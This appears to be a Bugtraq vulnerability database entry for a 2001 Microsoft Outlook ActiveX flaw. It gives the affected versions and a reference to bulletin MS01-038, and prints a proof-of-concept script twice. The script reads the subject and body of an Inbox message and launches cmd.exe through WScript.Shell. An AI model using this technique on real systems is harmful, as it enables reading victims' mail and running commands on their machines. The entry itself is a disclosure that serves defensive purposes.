Microsoft Outlook Unauthorized Email Access Vulnerability
BID:3025
Info
Microsoft Outlook Unauthorized Email Access Vulnerability
| Bugtraq ID: | 3025 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 12 2001 12:00AM |
| Updated: | Jul 12 2001 12:00AM |
| Credit: | Reported to bugtraq by Georgi Guninski <[email protected]> on July 12, 2001. |
| Vulnerable: |
Microsoft Outlook 98 0 Microsoft Outlook 2002 0 Microsoft Outlook 2000 0 |
| Not Vulnerable: | |
Exploit / POC
Microsoft Outlook Unauthorized Email Access Vulnerability
-----------------------------------------------------
This assumes you have at least one message in Outlook XP's Inbox
<br>
<object id="o1"
classid="clsid:0006F063-0000-0000-C000-000000000046"
>
<param name="folder" value="Inbox">
</object>
<script>
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
//vv1.Delete();
vv2=vv1.Session.Application.CreateObject("WScript.Shell");
alert("Much more fun is possible");
vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ ");
}
setTimeout("f()",2000);
</script>
-----------------------------------------------------
-----------------------------------------------------
This assumes you have at least one message in Outlook XP's Inbox
<br>
<object id="o1"
classid="clsid:0006F063-0000-0000-C000-000000000046"
>
<param name="folder" value="Inbox">
</object>
<script>
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
//vv1.Delete();
vv2=vv1.Session.Application.CreateObject("WScript.Shell");
alert("Much more fun is possible");
vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ ");
}
setTimeout("f()",2000);
</script>
-----------------------------------------------------
References
Microsoft Outlook Unauthorized Email Access Vulnerability
References:
References:
- Microsoft Security Bulletin MS01-038 (Microsoft)
- Vulnerability in IE/Outlook ActiveX control (Russ
)